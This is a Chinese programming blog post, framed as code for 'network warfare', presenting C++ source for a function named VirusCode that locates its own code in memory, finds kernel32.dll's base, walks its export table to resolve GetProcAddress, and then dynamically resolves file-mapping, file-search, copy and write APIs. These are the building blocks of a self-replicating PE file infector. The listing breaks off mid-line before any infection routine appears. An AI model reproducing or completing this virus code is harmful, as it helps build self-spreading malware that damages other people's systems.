现在的位置: 首页 > 综合 > 正文

基于visual c++之windows核心编程代码分析(65)实现程序自我复制

2013年08月18日 ⁄ 综合 ⁄ 共 17355字 ⁄ 字号 评论关闭

我们进行信息安全与网络战编程的时候,经常需要实现程序的自我复制,

我们如何实现程序的自我复制呢,

请见代码

[cpp]
view plaincopyprint?
  1. #include <iostream.h> 
  2. #include <windows.h> 
  3. #include <stdio.h> 
  4.  
  5. ////////////////////////////////////////////////////////////////////////// 
  6. //******************************************************************* 
  7. //*******以下为程序代码******* 
  8. //*******此段代码首先动态获取API入口地址 
  9. //*******然后实现代码的自我复制 
  10. //******************************************************************* 
  11. ////////////////////////////////////////////////////////////////////////// 
  12. void VirusCode() 
  14.     ////////////////////////////////////////////////////////////////////////// 
  15.     //  *******以下代码用于获取本函数在内存中的起始地址******* 
  16.     //  *******本函数功能相对独立******* 
  17.     ////////////////////////////////////////////////////////////////////////// 
  18.     ////////////////////////////////////////////////////////////////////////// 
  19.     //  *******变量说明******* 
  20.     //  **dwCodeBegin   :本函数的开始地址 
  21.     //  **dwCodeEnd     :本函数的结束地址 
  22.     //  **dwMyCodeAddr  :自己写的代码的开始地址 
  23.     ////////////////////////////////////////////////////////////////////////// 
  24.     DWORD dwCodeBegin , dwCodeEnd , dwMyCodeAddr; 
  25.      
  26.     //  *******指针变量******* 
  27.     PBYTE pMove = NULL; 
  28.      
  29.     //  *******动态获取自己写的代码的开始地址******* 
  30.     _asm 
  31.     { 
  32.         call    A 
  33. A: 
  34.         pop     eax 
  35.              
  36.         mov     dwMyCodeAddr , eax 
  37.     } 
  38.      
  39.     //  *******把地址赋给变量******* 
  40.     pMove = (PBYTE)dwMyCodeAddr; 
  41.      
  42.     //  *******向前搜索得到函数的真正入口地址******* 
  43.     while(!((*pMove == 0x55) && (*(pMove + 1) == 0x8B))) 
  44.     { 
  45.         pMove --; 
  46.     } 
  47.      
  48.     //  *******此时pMove指向函数的入口push ebp处******* 
  49.     dwCodeBegin = (DWORD)pMove; 
  50.      
  51.     //cout << "开始地址为:" << hex << dwCodeBegin << endl; 
  52.      
  53.     //  *******从自己写的代码处向后搜索******* 
  54.     pMove = (PBYTE)dwMyCodeAddr; 
  55.      
  56.     while (!((*(pMove + 1) == 0x5B) && (*pMove == 0x5E) && (*(pMove - 1) == 0x5F)
  57.             && (*(pMove + 2) == 0x8B) && (*(pMove + 3) == 0xE5))) 
  58.     { 
  59.         pMove ++; 
  60.     } 
  61.      
  62.     pMove += 9; 
  63.     //  *******此时pMove指向ret的前一条指令pop ebp处******* 
  64.     dwCodeEnd = (DWORD)pMove; 
  65.  
  66.     DWORD dwFunCodeLen; 
  67.     dwFunCodeLen = dwCodeEnd - dwCodeBegin; 
  68.  
  69.     ////////////////////////////////////////////////////////////////////////// 
  70.     //  *******上面为获取本函数的起始与结束地址******* 
  71.     ////////////////////////////////////////////////////////////////////////// 
  72.  
  73.     ////////////////////////////////////////////////////////////////////////// 
  74.     ////////////////////////////////////////////////////////////////////////// 
  75.     //  *******下面动态获取API入口地址 
  76.     ////////////////////////////////////////////////////////////////////////// 
  77.     ////////////////////////////////////////////////////////////////////////// 
  78.  
  79.     //  *******定义用到的字符串******* 
  80.     char GetProcAddrName[] = {'G','e','t','P','r','o','c','A','d','d','r','e','s','s','\0'}; 
  81.     char LoadLibName[] = {'L','o','a','d','L','i','b','r','a','r','y','A','\0'}; 
  82.      
  83.     DWORD KernelBase; 
  84.     //  *******获取本程序结束后的返回地址,此地址必须在开始处获得******* 
  85.     _asm 
  86.     { 
  87.         mov eax , [ebp+4] 
  88.             mov KernelBase,eax 
  89.     } 
  90.  
  91.     ////////////////////////////////////////////////////////////////////////// 
  92.     //  *******以下通过变换得到Kernel32.dll的基址******* 
  93.     ////////////////////////////////////////////////////////////////////////// 
  94.     KernelBase = KernelBase & 0Xffff0000; 
  95.      
  96.     //  *******检查是否到了kernel32.dll的装载基址******* 
  97.     IMAGE_DOS_HEADER *doshead; 
  98.      
  99.     while(KernelBase >= 0X70000000) 
  100.     { 
  101.         //  *******首先检查dos文件头******* 
  102.         doshead = (IMAGE_DOS_HEADER*)KernelBase; 
  103.         if(doshead->e_magic == IMAGE_DOS_SIGNATURE) 
  104.         { 
  105.             //  *******再检查NT文件头******* 
  106.             IMAGE_NT_HEADERS* nthead; 
  107.             nthead = (IMAGE_NT_HEADERS*)((LPBYTE)doshead+doshead->e_lfanew); 
  108.             if(nthead->Signature == IMAGE_NT_SIGNATURE) 
  109.             { 
  110.                 break
  111.             } 
  112.         } 
  113.         KernelBase-=0x10000; 
  114.     } 
  115.  
  116.     ////////////////////////////////////////////////////////////////////////// 
  117.     //  *******以下通过搜索kernel32.dll得到GetProcAddress的地址******* 
  118.     ////////////////////////////////////////////////////////////////////////// 
  119.  
  120.     DWORD AddrOfGetProcAddr , AddrOfLoadLib; 
  121.     IMAGE_DOS_HEADER* pFile1;   //指向dos文件头 
  122.     IMAGE_NT_HEADERS* pFile2;   //指向nt文件头 
  123.      
  124.     //  *******检查文件的合法性******* 
  125.     pFile1 = (IMAGE_DOS_HEADER* )KernelBase; 
  126.     if(pFile1->e_magic != IMAGE_DOS_SIGNATURE) 
  127.     { 
  128.         return
  129.     } 
  130.     pFile2 = (IMAGE_NT_HEADERS*)((PBYTE)pFile1 + pFile1->e_lfanew); 
  131.     if(pFile2->Signature != IMAGE_NT_SIGNATURE) 
  132.     { 
  133.         return
  134.     } 
  135.      
  136.     IMAGE_EXPORT_DIRECTORY *pExport; 
  137.     pExport = (IMAGE_EXPORT_DIRECTORY *)((PBYTE)pFile1 + pFile2->OptionalHeader.DataDirectory[0].VirtualAddress); 
  138.      
  139.     //  *******以下在导出表中搜索名字为"GetProcAddress"的函数地址******* 
  140.     char *FunName; 
  141.     DWORD *AddrOfNameRVA; 
  142.     WORD *AddrOfNameOrRVA; 
  143.      
  144.     AddrOfNameRVA = (DWORD*)(KernelBase + pExport->AddressOfNames); 
  145.     for (int i = 0 ; i < (int)pExport->NumberOfNames ; i++) 
  146.     { 
  147.         FunName = (char*)(KernelBase + AddrOfNameRVA[i]); 
  148.  
  149.         //  *******函数名与字符串"GetProcAddress"进行比较******* 
  150.         BOOL eql = 1; 
  151.         for (int j = 0 ; j < 15 ; j ++) 
  152.         { 
  153.             if (GetProcAddrName[j] != FunName[j]) 
  154.             { 
  155.                 eql = 0; 
  156.                 break
  157.             } 
  158.         } 
  159.         //  *******如果字符串相等了,说明找到了******* 
  160.         if (eql) 
  161.         { 
  162.             AddrOfNameOrRVA = (WORD*)(KernelBase + pExport->AddressOfNameOrdinals); 
  163.              
  164.             int num = 0; 
  165.              
  166.             num = pExport->Base + AddrOfNameOrRVA[i]; 
  167.              
  168.             DWORD *AddrOfFun; 
  169.              
  170.             AddrOfFun = (DWORD*)(KernelBase + pExport->AddressOfFunctions); 
  171.             AddrOfGetProcAddr = KernelBase + AddrOfFun[num - 1]; 
  172.              
  173.             break
  174.         } 
  175.     } 
  176.  
  177.     ////////////////////////////////////////////////////////////////////////// 
  178.     ////////////////////////////////////////////////////////////////////////// 
  179.     //  *******以下集中获取要用到的API入口地址******* 
  180.     ////////////////////////////////////////////////////////////////////////// 
  181.     ////////////////////////////////////////////////////////////////////////// 
  182.  
  183.     //  *******定义GetProcAddress函数类型******* 
  184.     typedef DWORD (WINAPI *stGetProcAddress)(HMODULE ,
    LPCSTR); 
  185.      
  186.     //  *******定义LoadLibraryA函数地址******* 
  187.     typedef DWORD (WINAPI *stLoadLibrary)(LPCSTR); 
  188.  
  189.     //  *******调用GetProcAddress获取LoadLibrary地址******* 
  190.     //  *******定义GetProcAddress函数变量******* 
  191.     stGetProcAddress myGetProcAddress; 
  192.      
  193.     //  *******给函数赋地址******* 
  194.     myGetProcAddress = (stGetProcAddress)AddrOfGetProcAddr; 
  195.      
  196.     //  *******调用GetProcAddress******* 
  197.     AddrOfLoadLib = myGetProcAddress((HMODULE)KernelBase , LoadLibName); 
  198.      
  199.     //  *******定义LoadLibrary函数变量******* 
  200.     stLoadLibrary myLoadLibrary; 
  201.      
  202.     //  *******给函数赋地址******* 
  203.     myLoadLibrary = (stLoadLibrary)AddrOfLoadLib; 
  204.      
  205.     char User32Name[] = {'u','s','e','r','3','2','.','d','l','l','\0'}; 
  206.     DWORD User32Base;   //存放user32.dll的基址 
  207.      
  208.     //  *******得到user32.dll的基址******* 
  209.     User32Base = myLoadLibrary(User32Name); 
  210.      
  211.     ////////////////////////////////////////////////////////////////////////// 
  212.     //  *****获取CreateFile函数地址***** 
  213.     ////////////////////////////////////////////////////////////////////////// 
  214.     //  *****首先定义函数类型***** 
  215.     typedef HANDLE (WINAPI *stCreateFile)(LPCTSTR ,
    DWORD , DWORD , LPSECURITY_ATTRIBUTES ,  
  216.                             DWORD ,
    DWORD , HANDLE); 
  217.     //  *****定义函数变量***** 
  218.     stCreateFile myCreateFile; 
  219.  
  220.     //  *****定义函数名称字符串***** 
  221.     char CreateFileName[] = {'C','r','e','a','t','e','F','i','l','e','A','\0'}; 
  222.  
  223.     //  *****获得函数地址***** 
  224.     myCreateFile = (stCreateFile)myGetProcAddress((HMODULE)KernelBase , CreateFileName); 
  225.  
  226.  
  227.     ////////////////////////////////////////////////////////////////////////// 
  228.     //  *****获取CreateFileMapping函数地址***** 
  229.     ////////////////////////////////////////////////////////////////////////// 
  230.     //  *****首先定义函数类型***** 
  231.     typedef HANDLE (WINAPI *stCreateFileMapping)(HANDLE , LPSECURITY_ATTRIBUTES ,  
  232.         DWORD , DWORD ,
    DWORD , LPCTSTR ); 
  233.  
  234.     //  *****定义函数变量***** 
  235.     stCreateFileMapping myCreateFileMapping; 
  236.  
  237.     //  *****定义函数名称字符串***** 
  238.     char CreateFileMappingName[] = {'C','r','e','a','t','e','F','i','l','e'
  239.                                     'M','a','p','p','i','n','g','A','\0'}; 
  240.  
  241.     //  *****获得函数地址***** 
  242.     myCreateFileMapping = (stCreateFileMapping)myGetProcAddress((HMODULE)KernelBase ,  
  243.                             CreateFileMappingName); 
  244.      
  245.  
  246.     ////////////////////////////////////////////////////////////////////////// 
  247.     //  *****获取MapViewOfFile函数地址***** 
  248.     ////////////////////////////////////////////////////////////////////////// 
  249.     //  *****首先定义函数类型***** 
  250.     typedef LPVOID (WINAPI *stMapViewOfFile)(HANDLE ,
    DWORD , DWORD ,
    DWORD , DWORD); 
  251.  
  252.     //  *****定义函数变量***** 
  253.     stMapViewOfFile myMapViewOfFile; 
  254.      
  255.     //  *****定义函数名称字符串***** 
  256.     char MapViewOfFileName[] = {'M','a','p','V','i','e','w','O','f','F','i','l','e','\0'}; 
  257.      
  258.     //  *****获得函数地址***** 
  259.     myMapViewOfFile = (stMapViewOfFile)myGetProcAddress((HMODULE)KernelBase ,  
  260.                                                         MapViewOfFileName); 
  261.  
  262.  
  263.     ////////////////////////////////////////////////////////////////////////// 
  264.     //  *****获取GlobalAlloc函数地址***** 
  265.     ////////////////////////////////////////////////////////////////////////// 
  266.     //  *****首先定义函数类型***** 
  267.     typedef HGLOBAL (WINAPI *stGlobalAlloc)(UINT ,
    SIZE_T); 
  268.  
  269.     //  *****定义函数变量***** 
  270.     stGlobalAlloc myGlobalAlloc; 
  271.      
  272.     //  *****定义函数名称字符串***** 
  273.     char GlobalAllocName[] = {'G','l','o','b','a','l','A','l','l','o','c','\0'}; 
  274.      
  275.     //  *****获得函数地址***** 
  276.     myGlobalAlloc = (stGlobalAlloc)myGetProcAddress((HMODULE)KernelBase ,  
  277.                                                         GlobalAllocName); 
  278.  
  279.  
  280.  
  281.     ////////////////////////////////////////////////////////////////////////// 
  282.     //  *****获取RtlMoveMemory函数地址***** 
  283.     ////////////////////////////////////////////////////////////////////////// 
  284.     //  *****首先定义函数类型***** 
  285.     typedef void (WINAPI *stRtlMoveMemory)(PVOID ,
    const VOID* ,
    SIZE_T ); 
  286.      
  287.     //  *****定义函数变量***** 
  288.     stRtlMoveMemory myRtlMoveMemory; 
  289.      
  290.     //  *****定义函数名称字符串***** 
  291.     char RtlMoveMemoryName[] = {'R','t','l','M','o','v','e','M','e','m','o','r','y','\0'}; 
  292.      
  293.     //  *****获得函数地址***** 
  294.     myRtlMoveMemory = (stRtlMoveMemory)myGetProcAddress((HMODULE)KernelBase ,  
  295.                                                         RtlMoveMemoryName); 
  296.  
  297.  
  298.  
  299.  
  300.     ////////////////////////////////////////////////////////////////////////// 
  301.     //  *****获取SetFilePointer函数地址***** 
  302.     ////////////////////////////////////////////////////////////////////////// 
  303.     //  *****首先定义函数类型***** 
  304.     typedef DWORD (WINAPI *stSetFilePointer)(HANDLE ,
    LONG , PLONG ,
    DWORD); 
  305.      
  306.     //  *****定义函数变量***** 
  307.     stSetFilePointer mySetFilePointer; 
  308.      
  309.     //  *****定义函数名称字符串***** 
  310.     char SetFilePointerName[] = {'S','e','t','F','i','l','e','P','o','i','n','t','e','r','\0'}; 
  311.      
  312.     //  *****获得函数地址***** 
  313.     mySetFilePointer = (stSetFilePointer)myGetProcAddress((HMODULE)KernelBase ,  
  314. SetFilePointerName);
  315.  
  316.  
  317.     ////////////////////////////////////////////////////////////////////////// 
  318.     //  *****获取WriteFile函数地址***** 
  319.     ////////////////////////////////////////////////////////////////////////// 
  320.     //  *****首先定义函数类型***** 
  321.     typedef BOOL (WINAPI *stWriteFile)(HANDLE ,
    LPCVOID , DWORD ,
    LPDWORD , LPOVERLAPPED); 
  322.      
  323.     //  *****定义函数变量***** 
  324.     stWriteFile myWriteFile; 
  325.      
  326.     //  *****定义函数名称字符串***** 
  327.     char WriteFileName[] = {'W','r','i','t','e','F','i','l','e','\0'}; 
  328.      
  329.     //  *****获得函数地址***** 
  330.     myWriteFile = (stWriteFile)myGetProcAddress((HMODULE)KernelBase ,  
  331.                                                         WriteFileName); 
  332.  
  333.  
  334.     ////////////////////////////////////////////////////////////////////////// 
  335.     //  *****获取SetEndOfFile函数地址***** 
  336.     ////////////////////////////////////////////////////////////////////////// 
  337.     //  *****首先定义函数类型***** 
  338.     typedef BOOL (WINAPI *stSetEndOfFile)(HANDLE); 
  339.  
  340.     //  *****定义函数变量***** 
  341.     stSetEndOfFile mySetEndOfFile; 
  342.      
  343.     //  *****定义函数名称字符串***** 
  344.     char SetEndOfFileName[] = {'S','e','t','E','n','d','O','f','F','i','l','e','\0'}; 
  345.      
  346.     //  *****获得函数地址***** 
  347.     mySetEndOfFile = (stSetEndOfFile)myGetProcAddress((HMODULE)KernelBase ,  
  348.                                                         SetEndOfFileName); 
  349.  
  350.  
  351.     ////////////////////////////////////////////////////////////////////////// 
  352.     //  *****获取CloseHandle函数地址***** 
  353.     ////////////////////////////////////////////////////////////////////////// 
  354.     //  *****首先定义函数类型***** 
  355.     typedef BOOL (WINAPI *stCloseHandle)(HANDLE); 
  356.  
  357.     //  *****定义函数变量***** 
  358.     stCloseHandle myCloseHandle; 
  359.      
  360.     //  *****定义函数名称字符串***** 
  361.     char CloseHandleName[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; 
  362.      
  363.     //  *****获得函数地址***** 
  364.     myCloseHandle = (stCloseHandle)myGetProcAddress((HMODULE)KernelBase ,  
  365.                                                         CloseHandleName); 
  366.  
  367.  
  368.     ////////////////////////////////////////////////////////////////////////// 
  369.     //  *****获取UnmapViewOfFile函数地址***** 
  370.     ////////////////////////////////////////////////////////////////////////// 
  371.     //  *****首先定义函数类型***** 
  372.     typedef BOOL (WINAPI *stUnmapViewOfFile)(LPCVOID); 
  373.  
  374.  
  375.     //  *****定义函数变量***** 
  376.     stUnmapViewOfFile myUnmapViewOfFile; 
  377.      
  378.     //  *****定义函数名称字符串***** 
  379.     char UnmapViewOfFileName[] = {'U','n','m','a','p','V','i','e','w','O','f','F','i','l','e','\0'}; 
  380.      
  381.     //  *****获得函数地址***** 
  382.     myUnmapViewOfFile = (stUnmapViewOfFile)myGetProcAddress((HMODULE)KernelBase ,  
  383. UnmapViewOfFileName);
  384.  
  385.  
  386.     ////////////////////////////////////////////////////////////////////////// 
  387.     //  *****获取FindFirstFile函数地址***** 
  388.     ////////////////////////////////////////////////////////////////////////// 
  389.     //  *****首先定义函数类型***** 
  390.     typedef HANDLE (WINAPI *stFindFirstFile)(LPCTSTR , LPWIN32_FIND_DATA); 
  391.  
  392.  
  393.     //  *****定义函数变量***** 
  394.     stFindFirstFile myFindFirstFile; 
  395.      
  396.     //  *****定义函数名称字符串***** 
  397.     char FindFirstFileName[] = {'F','i','n','d','F','i','r','s','t','F','i','l','e','A','\0'}; 
  398.      
  399.     //  *****获得函数地址***** 
  400.     myFindFirstFile = (stFindFirstFile)myGetProcAddress((HMODULE)KernelBase ,  
  401.                                                         FindFirstFileName); 
  402.  
  403.  
  404.     ////////////////////////////////////////////////////////////////////////// 
  405.     //  *****获取CopyFile函数地址***** 
  406.     ////////////////////////////////////////////////////////////////////////// 
  407.     //  *****首先定义函数类型***** 
  408.     typedef BOOL (WINAPI *stCopyFile)(LPCTSTR ,
    LPCTSTR , BOOL); 
  409.  
  410.  
  411.     //  *****定义函数变量***** 
  412.     stCopyFile myCopyFile; 
  413.      
  414.     //  *****定义函数名称字符串***** 
  415.     char CopyFileName[] = {'C','o','p','y','F','i','l','e','A','\0'}; 
  416.      
  417.     //  *****获得函数地址***** 
  418.     myCopyFile = (stCopyFile)myGetProcAddress((HMODULE)KernelBase ,  
  419.                                                         CopyFileName); 
  420.  
  421.  
  422.     ////////////////////////////////////////////////////////////////////////// 
  423.     //  *****获取FindNextFile函数地址***** 
  424.     ////////////////////////////////////////////////////////////////////////// 
  425.     //  *****首先定义函数类型***** 
  426.     typedef BOOL (WINAPI *stFindNextFile)(HANDLE , LPWIN32_FIND_DATA); 
  427.  
  428.     //  *****定义函数变量***** 
  429.     stFindNextFile myFindNextFile; 
  430.      
  431.     //  *****定义函数名称字符串***** 
  432.     char FindNextFileName[] = {'F','i','n','d','N','e','x','t','F','i','l','e','A','\0'}; 
  433.      
  434.     //  *****获得函数地址***** 
  435.     myFindNextFile = (stFindNextFile)myGetProcAddress((HMODULE)KernelBase ,  
  436.                                                         FindNextFileName); 
  437.  
  438.  
  439.     ////////////////////////////////////////////////////////////////////////// 
  440.     //  *****获取FindClose函数地址***** 
  441.     ////////////////////////////////////////////////////////////////////////// 
  442.     //  *****首先定义函数类型***** 
  443.     typedef BOOL (WINAPI *stFindClose)(HANDLE);  
  444.  
  445.     //  *****定义函数变量***** 
  446.     stFindClose myFindClose; 
  447.      
  448.     //  *****定义函数名称字符串***** 
  449.     char FindCloseName[] = {'F','i','n','d','C','l','o','s','e','\0'}; 
  450.      
  451.     //  *****获得函数地址***** 
  452.     myFindClose = (stFindClose)myGetProcAddress((HMODULE)KernelBase ,  
  453.                                                         FindCloseName); 
  454.  
  455.  
  456.     ////////////////////////////////////////////////////////////////////////// 
  457.     //  *****获取lstrcat函数地址***** 
  458.     ////////////////////////////////////////////////////////////////////////// 
  459.     //  *****首先定义函数类型***** 
  460.     typedef LPTSTR (WINAPI *stlstrcat)(LPTSTR ,
    LPTSTR); 
  461.  
  462.     //  *****定义函数变量***** 
  463.     stlstrcat mylstrcat; 
  464.      
  465.     //  *****定义函数名称字符串***** 
  466.     char lstrcatName[] = {'l','s','t','r','c','a','t','\0'}; 
  467.      
  468.     //  *****获得函数地址***** 
  469.     mylstrcat = (stlstrcat)myGetProcAddress((HMODULE)KernelBase ,  
  470.                                                         lstrcatName); 
  471.  
  472.  
  473.     ////////////////////////////////////////////////////////////////////////// 
  474.     //  *****获取lstrcpy函数地址***** 
  475.     ////////////////////////////////////////////////////////////////////////// 
  476.     //  *****首先定义函数类型***** 
  477.     typedef LPTSTR (WINAPI *stlstrcpy)(LPTSTR ,
    LPTSTR); 
  478.  
  479.     //  *****定义函数变量***** 
  480.     stlstrcpy mylstrcpy; 
  481.      
  482.     //  *****定义函数名称字符串***** 
  483.     char lstrcpyName[] = {'l','s','t','r','c','p','y','\0'}; 
  484.      
  485.     //  *****获得函数地址***** 
  486.     mylstrcpy = (stlstrcpy)myGetProcAddress((HMODULE)KernelBase ,  
  487.                                                         lstrcpyName); 
  488.  
  489.  
  490.     ////////////////////////////////////////////////////////////////////////// 
  491.     //  *****获取lstrlen函数地址***** 
  492.     ////////////////////////////////////////////////////////////////////////// 
  493.     //  *****首先定义函数类型***** 
  494.     typedef int (WINAPI *stlstrlen)(LPCTSTR); 
  495.  
  496.     //  *****定义函数变量***** 
  497.     stlstrlen mylstrlen; 
  498.      
  499.     //  *****定义函数名称字符串***** 
  500.     char lstrlenName[] = {'l','s','t','r','l','e','n','\0'}; 
  501.      
  502.     //  *****获得函数地址***** 
  503.     mylstrlen = (stlstrlen)myGetProcAddress((HMODULE)KernelBase ,  
  504.                                                         lstrlenName); 
  505.  
  506.  
  507.     ////////////////////////////////////////////////////////////////////////// 
  508.     //  *****获取RtlZeroMemory函数地址***** 
  509.     ////////////////////////////////////////////////////////////////////////// 
  510.     //  *****首先定义函数类型***** 
  511.     typedef void (WINAPI *stRtlZeroMemory)(PVOID ,
    SIZE_T); 
  512.      
  513.     //  *****定义函数变量***** 
  514.     stRtlZeroMemory myRtlZeroMemory; 
  515.      
  516.     //  *****定义函数名称字符串***** 
  517.     char RtlZeroMemoryName[] = {'R','t','l','Z','e','r','o',
返回
【上篇】
【下篇】

作者:

抱歉!评论已关闭.

返回首页

Copyright © 2013-2018 学步园  保留所有权利.
软文销售 QQ客服:2265327166 点击这里给我发消息(其他合作也可洽谈)
必威体育
必威电竞